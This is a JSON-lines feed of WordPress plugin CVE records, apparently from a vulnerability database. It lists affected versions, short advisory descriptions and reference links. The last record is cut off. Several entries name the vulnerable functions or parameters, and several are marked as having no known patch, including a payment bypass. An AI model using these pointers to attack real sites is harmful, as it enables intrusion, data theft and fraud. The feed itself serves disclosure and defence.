{"CVE_ID":"CVE-2023-2526","slug":"google-maps-easy","versionImpact":"1.11.7","description":"The Easy Google Maps plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.11.7. This is due to missing or incorrect nonce validation on the AJAX action handler. This makes it possible for unauthenticated attackers to execute AJAX actions via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2916430\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2916430\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2916430\\\/google-maps-easy\\\/trunk\\\/classes\\\/frame.php?contextall=1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2916430\\\/google-maps-easy\\\/trunk\\\/classes\\\/frame.php?contextall=1\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/google-maps-easy\\\/trunk\\\/classes\\\/frame.php?rev=2777743#L246\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/google-maps-easy\\\/trunk\\\/classes\\\/frame.php?rev=2777743#L246\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4ea4ca00-185b-4f5d-9c5c-f81ba4edad05?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4ea4ca00-185b-4f5d-9c5c-f81ba4edad05?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4425","slug":"defender-security","versionImpact":"2.4.6","description":"The Defender Security plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.4.6. This is due to missing or incorrect nonce validation on the verify_otp_login_time() function. This makes it possible for unauthenticated attackers to verify a one time login via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e772fbbe-33d5-46fa-a041-ab07d3f9318f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e772fbbe-33d5-46fa-a041-ab07d3f9318f?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2473684%40defender-security&new=2473684%40defender-security&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2473684%40defender-security&new=2473684%40defender-security&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4774","slug":"wp-piwik","versionImpact":"1.0.28","description":"The WP-Matomo Integration (WP-Piwik) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'wp-piwik' shortcode in versions up to, and including, 1.0.28 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2969705\\\/wp-piwik#file164\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2969705\\\/wp-piwik#file164\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-piwik\\\/tags\\\/1.0.28\\\/classes\\\/WP_Piwik\\\/Widget\\\/OptOut.php#L28\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-piwik\\\/tags\\\/1.0.28\\\/classes\\\/WP_Piwik\\\/Widget\\\/OptOut.php#L28\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/faa4f041-4740-4ebb-afb3-10019ce571be?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/faa4f041-4740-4ebb-afb3-10019ce571be?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5243","slug":"login-screen-manager","versionImpact":"3.5.2","description":"The Login Screen Manager WordPress plugin through 3.5.2 does not sanitize and escape some of its settings, which could allow high-privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ad895200-a03a-4e92-b256-d6991547d38a\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ad895200-a03a-4e92-b256-d6991547d38a\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-1618","slug":"coru-lfmember","versionImpact":"1.0.2","description":"The Coru LFMember WordPress plugin through 1.0.2 does not have a CSRF check in place when adding a new game, and is lacking sanitisation as well as escaping in its settings, allowing an attacker to make a logged-in admin add an arbitrary game with XSS payloads.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ddafcab2-b5db-4839-8ae1-188383f4250d\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ddafcab2-b5db-4839-8ae1-188383f4250d\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1686","slug":"woo-thank-you-page-customizer","versionImpact":"1.1.2","description":"The Thank You Page Customizer for WooCommerce \u2013 Increase Your Sales plugin for WordPress is vulnerable to missing authorization in all versions up to, and including, 1.1.2 via the apply_layout function due to a missing capability check. This makes it possible for authenticated attackers, with subscriber-level access and above, to retrieve arbitrary order data which may contain PII.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2e7ebc0c-6936-4632-a602-7131c7d8bd6a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2e7ebc0c-6936-4632-a602-7131c7d8bd6a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3041096\\\/woo-thank-you-page-customizer\\\/trunk\\\/frontend\\\/frontend.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3041096\\\/woo-thank-you-page-customizer\\\/trunk\\\/frontend\\\/frontend.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2382","slug":"authorizenet-payment-gateway-for-woocommerce","versionImpact":"8.0","description":"The Authorize.net Payment Gateway For WooCommerce plugin for WordPress is vulnerable to payment bypass in all versions up to, and including, 8.0. This is due to the plugin not properly verifying the authenticity of the request that updates an order's payment status. This makes it possible for unauthenticated attackers to update order payment statuses to paid, bypassing any payment.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4ab71d24-0409-421b-8abf-f4d5390a32a1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4ab71d24-0409-421b-8abf-f4d5390a32a1?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/authorizenet-payment-gateway-for-woocommerce\\\/trunk\\\/index.php#L205\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/authorizenet-payment-gateway-for-woocommerce\\\/trunk\\\/index.php#L205\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6625","slug":"wp-total-branding","versionImpact":"1.2","description":"The WP Total Branding \u2013 Complete branding solution for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3b6ac92f-2ad1-4528-b157-5e49d6f224a5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3b6ac92f-2ad1-4528-b157-5e49d6f224a5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-total-branding\\\/trunk\\\/includes\\\/modules\\\/login.php#L87\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-total-branding\\\/trunk\\\/includes\\\/modules\\\/login.php#L87\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3115880\\\/wp-total-branding\\\/trunk\\\/includes\\\/options\\\/login.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3115880\\\/wp-total-branding\\\/trunk\\\/includes\\\/options\\\/login.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3115880\\\/wp-total-branding\\\/trunk\\\/includes\\\/modules\\\/login.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3115880\\\/wp-total-branding\\\/trunk\\\/includes\\\/modules\\\/login.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-total-branding\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-total-branding\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7381","slug":"cf-geoplugin","versionImpact":"8.6.9","description":"The Geo Controller plugin for WordPress is vulnerable to unauthorized shortcode execution due to missing authorization and capability checks on the ajax__shortcode_cache function in all versions up to, and including, 8.6.9. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes available on the target site.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4ed7b13a-eec3-4035-8815-15228fb05af1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4ed7b13a-eec3-4035-8815-15228fb05af1?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cf-geoplugin\\\/tags\\\/8.6.9\\\/inc\\\/classes\\\/Shortcodes.php#L1932\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cf-geoplugin\\\/tags\\\/8.6.9\\\/inc\\\/classes\\\/Shortcodes.php#L1932\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9937","slug":"woo-manage-fraud-orders","versionImpact":"6.1.7","description":"The Woo Manage Fraud Orders plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'page' parameter in all versions up to, and including, 6.1.7 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fc8b0944-f669-40d3-899b-d7f91b1a1fea?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fc8b0944-f669-40d3-899b-d7f91b1a1fea?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-manage-fraud-orders\\\/trunk\\\/includes\\\/admin\\\/class-wmfo-logs-table.php#L108\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-manage-fraud-orders\\\/trunk\\\/includes\\\/admin\\\/class-wmfo-logs-table.php#L108\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-manage-fraud-orders\\\/trunk\\\/includes\\\/admin\\\/class-wmfo-fraud-attempts-table.php#L108\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-manage-fraud-orders\\\/trunk\\\/includes\\\/admin\\\/class-wmfo-fraud-attempts-table.php#L108\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10588","slug":"debug-tool","versionImpact":"2.2","description":"The Debug Tool plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the info() function in all versions up to, and including, 2.2. This makes it possible for authenticated attackers, with subscriber-level access and above, to obtain information from phpinfo(). When WP_DEBUG is enabled, this can be exploited by unauthenticated users as well.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1b01991c-de16-43c4-bb11-c8730230ce51?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1b01991c-de16-43c4-bb11-c8730230ce51?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/debug-tool\\\/trunk\\\/tools\\\/phpinfo.php#L43\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/debug-tool\\\/trunk\\\/tools\\\/phpinfo.php#L43\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9223","slug":"wpdash-notes","versionImpact":"1.3.5","description":"The WPDash Notes plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'wp_ajax_post_it_list_comment' function in all versions up to, and including, 1.3.5. This makes it possible for authenticated attackers, with Subscriber-level access and above, to view comments on any post, including private and password protected posts, and pending and draft posts if they were previously published. The vulnerability was partially patched in version 1.3.5.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpdash-notes\\\/trunk\\\/classes\\\/plugin.php#L210\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpdash-notes\\\/trunk\\\/classes\\\/plugin.php#L210\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/58f048e5-f4be-4452-8fed-16871f4020b6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/58f048e5-f4be-4452-8fed-16871f4020b6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10182","slug":"cognito-forms","versionImpact":"2.0.6","description":"The Cognito Forms plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'id' parameter in all versions up to, and including, 2.0.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cognito-forms\\\/trunk\\\/api.php#L46\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cognito-forms\\\/trunk\\\/api.php#L46\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cognito-forms\\\/trunk\\\/api.php#L50\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cognito-forms\\\/trunk\\\/api.php#L50\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cognito-forms\\\/trunk\\\/cognito-forms.php#L193\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cognito-forms\\\/trunk\\\/cognito-forms.php#L193\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cognito-forms\\\/trunk\\\/cognito-forms.php#L51\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cognito-forms\\\/trunk\\\/cognito-forms.php#L51\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/cognito-forms\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/cognito-forms\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/80b1d728-b5aa-4811-b92a-9ce36abc2b80?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/80b1d728-b5aa-4811-b92a-9ce36abc2b80?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12714","slug":"backlink-monitoring-manager","versionImpact":"0.1.3","description":"The Backlink Monitoring Manager WordPress plugin through 0.1.3 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f7fb2aef-16ce-4ae7-927c-2ffbc45fbda5\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f7fb2aef-16ce-4ae7-927c-2ffbc45fbda5\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13707","slug":"wp-image-uploader","versionImpact":"1.0.1","description":"The WP Image Uploader plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.1. This is due to missing or incorrect nonce validation on the gky_image_uploader_main_function() function. This makes it possible for unauthenticated attackers to delete arbitrary files via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-image-uploader\\\/trunk\\\/index.php#L85\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-image-uploader\\\/trunk\\\/index.php#L85\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/646a9885-8e0e-42a9-a113-0688c9f6dc93?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/646a9885-8e0e-42a9-a113-0688c9f6dc93?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-32581","slug":"cf7-manual-spam-blocker","versionImpact":"2.0.4","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Ankit Singla WordPress Spam Blocker allows Stored XSS. This issue affects WordPress Spam Blocker: from n\/a through 2.0.4.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/cf7-manual-spam-blocker\\\/vulnerability\\\/wordpress-wordpress-spam-blocker-plugin-2-0-4-csrf-to-stored-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/cf7-manual-spam-blocker\\\/vulnerability\\\/wordpress-wordpress-spam-blocker-plugin-2-0-4-csrf-to-stored-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-25708","slug":"wpvr","versionImpact":"8.2.7","description":"Cross-Site Request Forgery (CSRF) vulnerability in Rextheme WP VR \u2013 360 Panorama and Virtual Tour Builder For WordPress plugin <= 8.2.7 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wpvr\\\/wordpress-wp-vr-360-panorama-and-virtual-tour-builder-plugin-8-2-7-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wpvr\\\/wordpress-wp-vr-360-panorama-and-virtual-tour-builder-plugin-8-2-7-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2484","slug":"ldap-login-for-intranet-sites","versionImpact":"4.1.4","description":"The Active Directory Integration plugin for WordPress is vulnerable to time-based SQL Injection via the orderby and order parameters in versions up to, and including, 4.1.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers with administrator privileges to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ldap-login-for-intranet-sites\\\/trunk\\\/class-mo-ldap-user-auth-reports.php?rev=2859403#L64\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ldap-login-for-intranet-sites\\\/trunk\\\/class-mo-ldap-user-auth-reports.php?rev=2859403#L64\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2910898%40ldap-login-for-intranet-sites%2Ftrunk&old=2903294%40ldap-login-for-intranet-sites%2Ftrunk&sfp_email=&sfph_mail=#file5\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2910898%40ldap-login-for-intranet-sites%2Ftrunk&old=2903294%40ldap-login-for-intranet-sites%2Ftrunk&sfp_email=&sfph_mail=#file5\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3eedc57b-79cc-4569-b6d6-676a22aa1e06?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3eedc57b-79cc-4569-b6d6-676a22aa1e06?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4716","slug":"media-library-assistant","versionImpact":"3.10","description":"The Media Library Assistant plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'mla_gallery' shortcode in versions up to, and including, 3.10 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/media-library-assistant\\\/trunk\\\/includes\\\/class-mla-shortcode-support.php?rev=2955933#L1531\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/media-library-assistant\\\/trunk\\\/includes\\\/class-mla-shortcode-support.php?rev=2955933#L1531\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c5f6ae5d-7854-44c7-9fb8-efaa6e850d59?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c5f6ae5d-7854-44c7-9fb8-efaa6e850d59?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/media-library-assistant\\\/trunk\\\/includes\\\/class-mla-shortcode-support.php?rev=2955933#L1511\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/media-library-assistant\\\/trunk\\\/includes\\\/class-mla-shortcode-support.php?rev=2955933#L1511\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/media-library-assistant\\\/trunk\\\/includes\\\/class-mla-shortcode-support.php?rev=2955933#L1515\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/media-library-assistant\\\/trunk\\\/includes\\\/class-mla-shortcode-support.php?rev=2955933#L1515\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/media-library-assistant\\\/trunk\\\/includes\\\/class-mla-shortcode-support.php?rev=2955933#L1507\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/media-library-assistant\\\/trunk\\\/includes\\\/class-mla-shortcode-support.php?rev=2955933#L1507\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2963256\\\/media-library-assistant\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2963256\\\/media-library-assistant\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1912","slug":"categorify","versionImpact":"1.0.7.4","description":"The Categorify plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.7.4. This is due to missing or incorrect nonce validation on the categorifyAjaxUpdateFolderPosition function. This makes it possible for unauthenticated attackers to update the folder position of categories as well as update the metadata of other taxonomies via a forged request granted they can trick a site administrator into performing an action such as clicking on a 